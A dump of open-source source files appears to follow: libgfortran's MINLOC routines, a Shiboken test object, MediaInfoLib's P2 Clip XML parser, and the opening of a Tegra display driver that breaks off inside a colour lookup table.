see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
<http://www.gnu.org/licenses/>. */
#include "libgfortran.h"
#if defined (HAVE_GFC_REAL_10) && defined (HAVE_GFC_INTEGER_4)
extern void minloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict);
export_proto(minloc1_4_r10);
void
minloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type sstride[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
const GFC_REAL_10 * restrict base;
GFC_INTEGER_4 * restrict dest;
index_type rank;
index_type n;
index_type len;
index_type delta;
index_type dim;
int continue_loop;
/* Make dim zero based to avoid confusion. */
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
len = GFC_DESCRIPTOR_EXTENT(array,dim);
if (len < 0)
len = 0;
delta = GFC_DESCRIPTOR_STRIDE(array,dim);
for (n = 0; n < dim; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n);
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] < 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array, n + 1);
extent[n] = GFC_DESCRIPTOR_EXTENT(array, n + 1);
if (extent[n] < 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str = GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in"
" MINLOC intrinsic: is %ld, should be %ld",
(long int) (GFC_DESCRIPTOR_RANK (retarray)),
(long int) rank);
if (unlikely (compile_options.bounds_check))
bounds_ifunction_return ((array_t *) retarray, extent,
"return value", "MINLOC");
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
if (extent[n] <= 0)
return;
}
base = array->base_addr;
dest = retarray->base_addr;
continue_loop = 1;
while (continue_loop)
{
const GFC_REAL_10 * restrict src;
GFC_INTEGER_4 result;
src = base;
{
GFC_REAL_10 minval;
#if defined (GFC_REAL_10_INFINITY)
minval = GFC_REAL_10_INFINITY;
#else
minval = GFC_REAL_10_HUGE;
#endif
result = 1;
if (len <= 0)
*dest = 0;
else
{
for (n = 0; n < len; n++, src += delta)
{
#if defined (GFC_REAL_10_QUIET_NAN)
if (*src <= minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
break;
}
}
for (; n < len; n++, src += delta)
{
#endif
if (*src < minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
}
}
*dest = result;
}
}
/* Advance to the next element. */
count[0]++;
base += sstride[0];
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
base -= sstride[n] * extent[n];
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
{
/* Break out of the look. */
continue_loop = 0;
break;
}
else
{
count[n]++;
base += sstride[n];
dest += dstride[n];
}
}
}
}
extern void mminloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict,
gfc_array_l1 * const restrict);
export_proto(mminloc1_4_r10);
void
mminloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim,
gfc_array_l1 * const restrict mask)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type sstride[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
index_type mstride[GFC_MAX_DIMENSIONS];
GFC_INTEGER_4 * restrict dest;
const GFC_REAL_10 * restrict base;
const GFC_LOGICAL_1 * restrict mbase;
int rank;
int dim;
index_type n;
index_type len;
index_type delta;
index_type mdelta;
int mask_kind;
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
len = GFC_DESCRIPTOR_EXTENT(array,dim);
if (len <= 0)
return;
mbase = mask->base_addr;
mask_kind = GFC_DESCRIPTOR_SIZE (mask);
if (mask_kind == 1 || mask_kind == 2 || mask_kind == 4 || mask_kind == 8
#ifdef HAVE_GFC_LOGICAL_16
|| mask_kind == 16
#endif
)
mbase = GFOR_POINTER_TO_L1 (mbase, mask_kind);
else
runtime_error ("Funny sized logical array");
delta = GFC_DESCRIPTOR_STRIDE(array,dim);
mdelta = GFC_DESCRIPTOR_STRIDE_BYTES(mask,dim);
for (n = 0; n < dim; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n);
mstride[n] = GFC_DESCRIPTOR_STRIDE_BYTES(mask,n);
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] < 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
sstride[n] = GFC_DESCRIPTOR_STRIDE(array,n + 1);
mstride[n] = GFC_DESCRIPTOR_STRIDE_BYTES(mask, n + 1);
extent[n] = GFC_DESCRIPTOR_EXTENT(array, n + 1);
if (extent[n] < 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str= GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
else
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in MINLOC intrinsic");
if (unlikely (compile_options.bounds_check))
{
bounds_ifunction_return ((array_t *) retarray, extent,
"return value", "MINLOC");
bounds_equal_extents ((array_t *) mask, (array_t *) array,
"MASK argument", "MINLOC");
}
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
if (extent[n] <= 0)
return;
}
dest = retarray->base_addr;
base = array->base_addr;
while (base)
{
const GFC_REAL_10 * restrict src;
const GFC_LOGICAL_1 * restrict msrc;
GFC_INTEGER_4 result;
src = base;
msrc = mbase;
{
GFC_REAL_10 minval;
#if defined (GFC_REAL_10_INFINITY)
minval = GFC_REAL_10_INFINITY;
#else
minval = GFC_REAL_10_HUGE;
#endif
#if defined (GFC_REAL_10_QUIET_NAN)
GFC_INTEGER_4 result2 = 0;
#endif
result = 0;
for (n = 0; n < len; n++, src += delta, msrc += mdelta)
{
if (*msrc)
{
#if defined (GFC_REAL_10_QUIET_NAN)
if (!result2)
result2 = (GFC_INTEGER_4)n + 1;
if (*src <= minval)
#endif
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
break;
}
}
}
#if defined (GFC_REAL_10_QUIET_NAN)
if (unlikely (n >= len))
result = result2;
else
#endif
for (; n < len; n++, src += delta, msrc += mdelta)
{
if (*msrc && *src < minval)
{
minval = *src;
result = (GFC_INTEGER_4)n + 1;
}
}
*dest = result;
}
/* Advance to the next element. */
count[0]++;
base += sstride[0];
mbase += mstride[0];
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
base -= sstride[n] * extent[n];
mbase -= mstride[n] * extent[n];
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
{
/* Break out of the look. */
base = NULL;
break;
}
else
{
count[n]++;
base += sstride[n];
mbase += mstride[n];
dest += dstride[n];
}
}
}
}
extern void sminloc1_4_r10 (gfc_array_i4 * const restrict,
gfc_array_r10 * const restrict, const index_type * const restrict,
GFC_LOGICAL_4 *);
export_proto(sminloc1_4_r10);
void
sminloc1_4_r10 (gfc_array_i4 * const restrict retarray,
gfc_array_r10 * const restrict array,
const index_type * const restrict pdim,
GFC_LOGICAL_4 * mask)
{
index_type count[GFC_MAX_DIMENSIONS];
index_type extent[GFC_MAX_DIMENSIONS];
index_type dstride[GFC_MAX_DIMENSIONS];
GFC_INTEGER_4 * restrict dest;
index_type rank;
index_type n;
index_type dim;
if (*mask)
{
minloc1_4_r10 (retarray, array, pdim);
return;
}
/* Make dim zero based to avoid confusion. */
dim = (*pdim) - 1;
rank = GFC_DESCRIPTOR_RANK (array) - 1;
for (n = 0; n < dim; n++)
{
extent[n] = GFC_DESCRIPTOR_EXTENT(array,n);
if (extent[n] <= 0)
extent[n] = 0;
}
for (n = dim; n < rank; n++)
{
extent[n] =
GFC_DESCRIPTOR_EXTENT(array,n + 1);
if (extent[n] <= 0)
extent[n] = 0;
}
if (retarray->base_addr == NULL)
{
size_t alloc_size, str;
for (n = 0; n < rank; n++)
{
if (n == 0)
str = 1;
else
str = GFC_DESCRIPTOR_STRIDE(retarray,n-1) * extent[n-1];
GFC_DIMENSION_SET(retarray->dim[n], 0, extent[n] - 1, str);
}
retarray->offset = 0;
retarray->dtype = (array->dtype & ~GFC_DTYPE_RANK_MASK) | rank;
alloc_size = GFC_DESCRIPTOR_STRIDE(retarray,rank-1) * extent[rank-1];
if (alloc_size == 0)
{
/* Make sure we have a zero-sized array. */
GFC_DIMENSION_SET(retarray->dim[0], 0, -1, 1);
return;
}
else
retarray->base_addr = xmallocarray (alloc_size, sizeof (GFC_INTEGER_4));
}
else
{
if (rank != GFC_DESCRIPTOR_RANK (retarray))
runtime_error ("rank of return array incorrect in"
" MINLOC intrinsic: is %ld, should be %ld",
(long int) (GFC_DESCRIPTOR_RANK (retarray)),
(long int) rank);
if (unlikely (compile_options.bounds_check))
{
for (n=0; n < rank; n++)
{
index_type ret_extent;
ret_extent = GFC_DESCRIPTOR_EXTENT(retarray,n);
if (extent[n] != ret_extent)
runtime_error ("Incorrect extent in return value of"
" MINLOC intrinsic in dimension %ld:"
" is %ld, should be %ld", (long int) n + 1,
(long int) ret_extent, (long int) extent[n]);
}
}
}
for (n = 0; n < rank; n++)
{
count[n] = 0;
dstride[n] = GFC_DESCRIPTOR_STRIDE(retarray,n);
}
dest = retarray->base_addr;
while(1)
{
*dest = 0;
count[0]++;
dest += dstride[0];
n = 0;
while (count[n] == extent[n])
{
/* When we get to the end of a dimension, reset it and increment
the next dimension. */
count[n] = 0;
/* We could precalculate these products, but this is a less
frequently used path so probably not worth it. */
dest -= dstride[n] * extent[n];
n++;
if (n == rank)
return;
else
{
count[n]++;
dest += dstride[n];
}
}
}
}
#endif
| gpl-2.0 |
M4rtinK/shiboken-android | tests/libminimal/obj.cpp | 3 | 1083 | /*
* This file is part of the Shiboken Python Binding Generator project.
*
* Copyright (C) 2011 Nokia Corporation and/or its subsidiary(-ies).
*
* Contact: PySide team <contact@pyside.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "obj.h"
Obj::Obj(int objId) : m_objId(objId)
{
}
Obj::~Obj()
{
}
bool
Obj::virtualMethod(int val)
{
return !bool(val%2);
}
| gpl-2.0 |
eagleatustb/p2pdown | source/third_party/MediaInfoLib/Source/MediaInfo/Multiple/File_P2_Clip.cpp | 3 | 19471 | // File_P2_Clip - Info for P2 Clip (XML) files
// Copyright (C) 2010-2011 MediaArea.net SARL, Info@MediaArea.net
//
// This library is free software: you can redistribute it and/or modify it
// under the terms of the GNU Lesser General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// any later version.
//
// This library is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Lesser General Public License for more details.
//
// You should have received a copy of the GNU Lesser General Public License
// along with this library. If not, see <http://www.gnu.org/licenses/>.
//
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//---------------------------------------------------------------------------
// Pre-compilation
#include "MediaInfo/PreComp.h"
#ifdef __BORLANDC__
#pragma hdrstop
#endif
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#include "MediaInfo/Setup.h"
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#if defined(MEDIAINFO_P2_YES)
//---------------------------------------------------------------------------
//---------------------------------------------------------------------------
#include "MediaInfo/Multiple/File_P2_Clip.h"
#include "MediaInfo/MediaInfo.h"
#include "MediaInfo/MediaInfo_Internal.h"
#include "MediaInfo/Multiple/File__ReferenceFilesHelper.h"
#include "ZenLib/Dir.h"
#include "ZenLib/FileName.h"
#include "ZenLib/TinyXml/tinyxml.h"
//---------------------------------------------------------------------------
namespace MediaInfoLib
{
//***************************************************************************
// Constructor/Destructor
//***************************************************************************
//---------------------------------------------------------------------------
File_P2_Clip::File_P2_Clip()
:File__Analyze()
{
//Temp
ReferenceFiles=NULL;
}
//---------------------------------------------------------------------------
File_P2_Clip::~File_P2_Clip()
{
delete ReferenceFiles; //ReferenceFiles=NULL;
}
//***************************************************************************
// Streams management
//***************************************************************************
//---------------------------------------------------------------------------
void File_P2_Clip::Streams_Finish()
{
if (ReferenceFiles==NULL)
return;
ReferenceFiles->ParseReferences();
}
//***************************************************************************
// Buffer - Global
//***************************************************************************
//---------------------------------------------------------------------------
#if MEDIAINFO_SEEK
size_t File_P2_Clip::Read_Buffer_Seek (size_t Method, int64u Value, int64u ID)
{
if (ReferenceFiles==NULL)
return 0;
return ReferenceFiles->Read_Buffer_Seek(Method, Value, ID);
}
#endif //MEDIAINFO_SEEK
//***************************************************************************
// Buffer - File header
//***************************************************************************
//---------------------------------------------------------------------------
bool File_P2_Clip::FileHeader_Begin()
{
//Element_Size
if (File_Size<5 || File_Size>64*1024)
{
Reject("P2_Clip");
return false; //P2_Clip XML files are not big
}
//Element_Size
if (Buffer_Size<File_Size)
return false; //Must wait for more data
//XML header
if (Buffer[0]!='<'
|| Buffer[1]!='?'
|| Buffer[2]!='x'
|| Buffer[3]!='m'
|| Buffer[4]!='l')
{
Reject("P2_Clip");
return false;
}
TiXmlDocument document(File_Name.To_Local());
if (document.LoadFile())
{
TiXmlElement* Root=document.FirstChildElement("P2Main");
if (Root)
{
Accept("P2_Clip");
Fill(Stream_General, 0, General_Format, "P2 Clip");
ReferenceFiles=new File__ReferenceFilesHelper(this, Config);
TiXmlElement* ClipContent=Root->FirstChildElement("ClipContent");
if (ClipContent)
{
TiXmlElement* ChildElement;
//ID
ChildElement=ClipContent->FirstChildElement("GlobalClipID");
if (ChildElement)
Fill(Stream_General, 0, General_UniqueID, ChildElement->GetText());
//Duration
Ztring Duration, EditUnit;
ChildElement=ClipContent->FirstChildElement("Duration");
if (ChildElement)
Duration=ChildElement->GetText();
ChildElement=ClipContent->FirstChildElement("EditUnit");
if (ChildElement)
EditUnit=ChildElement->GetText();
int64u Duration_Frames=Duration.To_int64u();
int64u EditUnit_Numerator=EditUnit.SubString(Ztring(), _T("/")).To_int64u();
int64u EditUnit_Denominator=EditUnit.SubString(_T("/"), Ztring()).To_int64u();
if (Duration_Frames && EditUnit_Numerator && EditUnit_Denominator)
Fill(Stream_General, 0, General_Duration, ((float32)Duration_Frames)*1000*EditUnit_Numerator/EditUnit_Denominator, 0);
//EssenceList
TiXmlElement* EssenceList=ClipContent->FirstChildElement("EssenceList");
if (EssenceList)
{
TiXmlElement* Track=EssenceList->FirstChildElement();
size_t Audio_Count=0;
while (Track)
{
string Field=Track->ValueStr();
if (Field=="Video")
{
File__ReferenceFilesHelper::reference ReferenceFile;
//FrameRate
ChildElement=Track->FirstChildElement("FrameRate");
if (ChildElement)
{
Ztring FrameRateS=Ztring(ChildElement->GetText());
if (FrameRateS.find(_T("23.97"))==0)
ReferenceFile.FrameRate=((float64)24)*1000/1001;
else if (FrameRateS.find(_T("29.97"))==0)
ReferenceFile.FrameRate=((float64)30)*1000/1001;
else if (FrameRateS.find(_T("59.94"))==0)
ReferenceFile.FrameRate=((float64)60)*1000/1001;
else
ReferenceFile.FrameRate=FrameRateS.To_float64();
if (FrameRateS.find('i')!=string::npos)
ReferenceFile.FrameRate/=2;
}
//CreationDate
ChildElement=Track->FirstChildElement("StartTimecode");
if (ChildElement)
{
string Text=ChildElement->GetText();
if (Text.size()==11)
{
int64u ToFill=(Text[0]-'0')*10*60*60*1000
+ (Text[1]-'0') *60*60*1000
+ (Text[3]-'0') *10*60*1000
+ (Text[4]-'0') *60*1000
+ (Text[6]-'0') *10*1000
+ (Text[7]-'0') *1000;
if (ReferenceFile.FrameRate)
ToFill+=float64_int64s(((Text[9]-'0')*10+(Text[10]-'0'))*1000/ReferenceFile.FrameRate);
//Fill(Stream_Video, StreamPos_Last, Video_Delay, ToFill);
//Fill(Stream_Video, StreamPos_Last, Video_Delay_Source, "P2 Clip");
}
}
#if defined(MEDIAINFO_MXF_YES)
if (File_Name.size()>10+1+4
&& File_Name[File_Name.size()-10-1]==PathSeparator
&& (File_Name[File_Name.size()-10-2]&(~0x20))==_T('P')
&& (File_Name[File_Name.size()-10-3]&(~0x20))==_T('I')
&& (File_Name[File_Name.size()-10-4]&(~0x20))==_T('L')
&& (File_Name[File_Name.size()-10-5]&(~0x20))==_T('C'))
{
Ztring file=File_Name.substr(File_Name.size()-10, 6);
Ztring MXF_File=File_Name;
MXF_File.resize(MXF_File.size()-(10+1+4));
MXF_File+=_T("VIDEO");
MXF_File+=PathSeparator;
MXF_File+=file;
MXF_File+=_T(".MXF");
ReferenceFile.FileNames.push_back(MXF_File);
ReferenceFile.StreamKind=Stream_Video;
ReferenceFile.StreamID=Ztring::ToZtring(ReferenceFiles->References.size()+1);
ReferenceFiles->References.push_back(ReferenceFile);
}
#endif //defined(MEDIAINFO_MXF_YES)
}
else if (Field=="Audio")
{
#if defined(MEDIAINFO_MXF_YES)
if (File_Name.size()>10+1+4
&& File_Name[File_Name.size()-10-1]==PathSeparator
&& (File_Name[File_Name.size()-10-2]&(~0x20))==_T('P')
&& (File_Name[File_Name.size()-10-3]&(~0x20))==_T('I')
&& (File_Name[File_Name.size()-10-4]&(~0x20))==_T('L')
&& (File_Name[File_Name.size()-10-5]&(~0x20))==_T('C'))
{
Ztring file=File_Name.substr(File_Name.size()-10, 6);
Ztring MXF_File=File_Name;
MXF_File.resize(MXF_File.size()-(10+1+4));
MXF_File+=_T("AUDIO");
MXF_File+=PathSeparator;
MXF_File+=file;
Ztring Pos=Ztring::ToZtring(Audio_Count);
if (Pos.size()<2)
Pos.insert(0, 1, _T('0'));
MXF_File+=Pos;
MXF_File+=_T(".MXF");
File__ReferenceFilesHelper::reference ReferenceFile;
ReferenceFile.FileNames.push_back(MXF_File);
ReferenceFile.StreamKind=Stream_Audio;
ReferenceFile.StreamID=Ztring::ToZtring(ReferenceFiles->References.size()+1);
ReferenceFiles->References.push_back(ReferenceFile);
Audio_Count++;
}
#endif //defined(MEDIAINFO_MXF_YES)
}
Track=Track->NextSiblingElement();
}
}
//ClipMetadata
TiXmlElement* ClipMetadata=ClipContent->FirstChildElement("ClipMetadata");
if (ClipMetadata)
{
TiXmlElement* Access=ClipMetadata->FirstChildElement("Access");
if (Access)
{
//CreationDate
ChildElement=Access->FirstChildElement("CreationDate");
if (ChildElement)
{
Ztring Content=ChildElement->GetText();
if (Content.size()>=11 && Content[10]==_T('T'))
Content[10]=_T(' ');
if (Content.find(_T("+00:00"))!=string::npos)
{
Content.resize(10+1+8);
Content.insert(0, _T("UTC "));
}
Fill(Stream_General, 0, General_Recorded_Date, Content);
}
//CreationDate
ChildElement=Access->FirstChildElement("LastUpdateDate");
if (ChildElement)
{
Ztring Content=ChildElement->GetText();
if (Content.size()>=11 && Content[10]==_T('T'))
Content[10]=_T(' ');
if (Content.find(_T("+00:00"))!=string::npos)
{
Content.resize(10+1+8);
Content.insert(0, _T("UTC "));
}
Fill(Stream_General, 0, General_Tagged_Date, Content);
}
}
TiXmlElement* Device=ClipMetadata->FirstChildElement("Device");
if (Device)
{
//Manufacturer+ModelName
TiXmlElement* Manufacturer=Device->FirstChildElement("Manufacturer");
TiXmlElement* ModelName=Device->FirstChildElement("ModelName");
if (Manufacturer && ModelName)
Fill(Stream_General, 0, General_Encoded_Application, string(Manufacturer->GetText())+" "+ModelName->GetText());
}
TiXmlElement* Shoot=ClipMetadata->FirstChildElement("Shoot");
if (Shoot)
{
//StartDate
ChildElement=Shoot->FirstChildElement("StartDate");
if (ChildElement)
{
Ztring Content=ChildElement->GetText();
if (Content.size()>=11 && Content[10]==_T('T'))
Content[10]=_T(' ');
if (Content.find(_T("+00:00"))!=string::npos)
{
Content.resize(10+1+8);
Content.insert(0, _T("UTC "));
}
Fill(Stream_General, 0, General_Duration_Start, Content);
}
//EndDate
ChildElement=Shoot->FirstChildElement("EndDate");
if (ChildElement)
{
Ztring Content=ChildElement->GetText();
if (Content.size()>=11 && Content[10]==_T('T'))
Content[10]=_T(' ');
if (Content.find(_T("+00:00"))!=string::npos)
{
Content.resize(10+1+8);
Content.insert(0, _T("UTC "));
}
Fill(Stream_General, 0, General_Duration_End, Content);
}
//Location
TiXmlElement* Location=Shoot->FirstChildElement("Location");
if (Location)
{
//Longitude+Latitude
TiXmlElement* Longitude=Location->FirstChildElement("Longitude");
TiXmlElement* Latitude=Location->FirstChildElement("Latitude");
if (Longitude && Latitude)
Fill(Stream_General, 0, General_Recorded_Location, string(Latitude->GetText())+", "+Longitude->GetText());
}
}
TiXmlElement* Scenario=ClipMetadata->FirstChildElement("Scenario");
if (Scenario)
{
//ProgramName
ChildElement=Scenario->FirstChildElement("ProgramName");
if (ChildElement)
Fill(Stream_General, 0, General_Title, ChildElement->GetText());
//SceneNo.
ChildElement=Scenario->FirstChildElement("SceneNo.");
if (ChildElement)
Fill(Stream_General, 0, "Scene Number", ChildElement->GetText());
//TakeNo.
ChildElement=Scenario->FirstChildElement("TakeNo.");
if (ChildElement)
Fill(Stream_General, 0, "Take Number", ChildElement->GetText());
}
TiXmlElement* News=ClipMetadata->FirstChildElement("News");
if (News)
{
//Reporter
ChildElement=News->FirstChildElement("Reporter");
if (ChildElement)
Fill(Stream_General, 0, "Reporter", ChildElement->GetText());
//Purpose
ChildElement=News->FirstChildElement("Purpose");
if (ChildElement)
Fill(Stream_General, 0, "Purpose", ChildElement->GetText());
//Object
ChildElement=News->FirstChildElement("Object");
if (ChildElement)
Fill(Stream_General, 0, "Object", ChildElement->GetText());
}
}
}
}
else
{
Reject("P2_Clip");
return false;
}
}
else
{
Reject("P2_Clip");
return false;
}
//All should be OK...
return true;
}
} //NameSpace
#endif //MEDIAINFO_P2_YES
| gpl-2.0 |
thune-xiaobai/android_kernel_zte_pluto | drivers/video/tegra/dc/dc.c | 3 | 72020 | /*
* drivers/video/tegra/dc/dc.c
*
* Copyright (C) 2010 Google, Inc.
* Author: Erik Gilling <konkers@android.com>
*
* Copyright (c) 2010-2013, NVIDIA CORPORATION, All rights reserved.
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/err.h>
#include <linux/errno.h>
#include <linux/interrupt.h>
#include <linux/slab.h>
#include <linux/io.h>
#include <linux/clk.h>
#include <linux/mutex.h>
#include <linux/delay.h>
#include <linux/dma-mapping.h>
#include <linux/workqueue.h>
#include <linux/ktime.h>
#include <linux/debugfs.h>
#include <linux/seq_file.h>
#include <linux/backlight.h>
#include <linux/gpio.h>
#include <linux/nvhost.h>
#include <video/tegrafb.h>
#include <drm/drm_fixed.h>
#ifdef CONFIG_SWITCH
#include <linux/switch.h>
#endif
#define CREATE_TRACE_POINTS
#include <trace/events/display.h>
#include <mach/clk.h>
#include <mach/dc.h>
#include <mach/fb.h>
#include <mach/mc.h>
#include <linux/nvhost.h>
#include <mach/latency_allowance.h>
#include <mach/iomap.h>
#include "dc_reg.h"
#include "dc_config.h"
#include "dc_priv.h"
#include "dev.h"
#include "nvsd.h"
#define TEGRA_CRC_LATCHED_DELAY 34
#define DC_COM_PIN_OUTPUT_POLARITY1_INIT_VAL 0x01000000
#define DC_COM_PIN_OUTPUT_POLARITY3_INIT_VAL 0x0
static struct fb_videomode tegra_dc_hdmi_fallback_mode = {
.refresh = 60,
.xres = 640,
.yres = 480,
.pixclock = KHZ2PICOS(25200),
.hsync_len = 96, /* h_sync_width */
.vsync_len = 2, /* v_sync_width */
.left_margin = 48, /* h_back_porch */
.upper_margin = 33, /* v_back_porch */
.right_margin = 16, /* h_front_porch */
.lower_margin = 10, /* v_front_porch */
.vmode = 0,
.sync = 0,
};
static struct tegra_dc_mode override_disp_mode[3];
static void _tegra_dc_controller_disable(struct tegra_dc *dc);
#if CONFIG_ESD_READ_TE
static struct tegra_dc *g_dc;
extern void tegra_dc_dsi_reset_lcd(struct tegra_dc *dc);
#endif
struct tegra_dc *tegra_dcs[TEGRA_MAX_DC];
DEFINE_MUTEX(tegra_dc_lock);
DEFINE_MUTEX(shared_lock);
static const struct {
bool h;
bool v;
} can_filter[] = {
/* Window A has no filtering */
{ false, false },
/* Window B has both H and V filtering */
{ true, true },
/* Window C has only H filtering */
{ false, true },
};
#ifdef CONFIG_TEGRA_DC_CMU
static struct tegra_dc_cmu default_cmu = {
/* lut1 maps sRGB to linear space. */
{
0, 1, 2, 4, 5, 6, 7, 9,
10, 11, 12, 14, 15, 16, 18, 20,
21, 23, 25, 27, 29, 31, 33, 35,
37, 40, 42, 45, 48, 50, 53, 56,
59, 62, 66, 69, 72, 76, 79, 83,
87, 91, 95, 99, 103, 107, 112, 116,
121, 126, 131, 136, 141, 146, 151, 156,
162, 168, 173, 179, 185, 191, 197, 204,
210, 216, 223, 230, 237, 244, 251, 258,
265, 273, 280, 288, 296, 304, 312, 320,
329, 337, 346, 354, 363, 372, 381, 390,
400, 409, 419, 428, 438, 448, 458, 469,
479, 490, 500, 511, 522, 533, 544, 555,
567, 578, 590, 602, 614, 626, 639, 651,
664, 676, 689, 702, 715, 728, 742, 755,
769, 783, 797, 811, 825, 840, 854, 869,
884, 899, 914, 929, 945, 960, 976, 992,
1008, 1024, 1041, 1057, 1074, 1091, 1108, 1125,
1142, 1159, 1177, 1195, 1213, 1231, 1249, 1267,
1286, 1304, 1323, 1342, 1361, 1381, 1400, 1420,
1440, 1459, 1480, 1500, 1520, 1541, 1562, 1582,
1603, 1625, 1646, 1668, 1689, 1711, 1733, 1755,
1778, 1800, 1823, 1846, 1869, 1892, 1916, 1939,
1963, 1987, 2011, 2035, 2059, 2084, 2109, 2133,
2159, 2184, 2209, 2235, 2260, 2286, 2312, 2339,
2365, 2392, 2419, 2446, 2473, 2500, 2527, 2555,
2583, 2611, 2639, 2668, 2696, 2725, 2754, 2783,
2812, 2841, 2871, 2901, 2931, 2961, 2991, 3022,
3052, 3083, 3114, 3146, 3177, 3209, 3240, 3272,
3304, 3337, 3369, 3402, 3435, 3468, 3501, 3535,
3568, 3602, 3636, 3670, 3705, 3739, 3774, 3809,
3844, 3879, 3915, 3950, 3986, 4022, 4059, 4095,
},
/* csc */
{
0x100, 0x0, 0x0,
0x0, 0x100, 0x0,
0x0, 0x0, 0x100,
},
/* lut2 maps linear space to sRGB*/
{
0, 1, 2, 2, 3, 4, 5, 6,
6, 7, 8, 9, 10, 10, 11, 12,
13, 13, 14, 15, 15, 16, 16, 17,
18, 18, 19, 19, 20, 20, 21, 21,
22, 22, 23, 23, 23, 24, 24, 25,
25, 25, 26, 26, 27, 27, 27, 28,
28, 29, 29, 29, 30, 30, 30, 31,
31, 31, 32, 32, 32, 33, 33, 33,
34, 34, 34, 34, 35, 35, 35, 36,
36, 36, 37, 37, 37, 37, 38, 38,
38, 38, 39, 39, 39, 40, 40, 40,
40, 41, 41, 41, 41, 42, 42, 42,
42, 43, 43, 43, 43, 43, 44, 44,
44, 44, 45, 45, 45, 45, 46, 46,
46, 46, 46, 47, 47, 47, 47, 48,
48, 48, 48, 48, 49, 49, 49, 49,
49, 50, 50, 50, 50, 50, 51, 51,
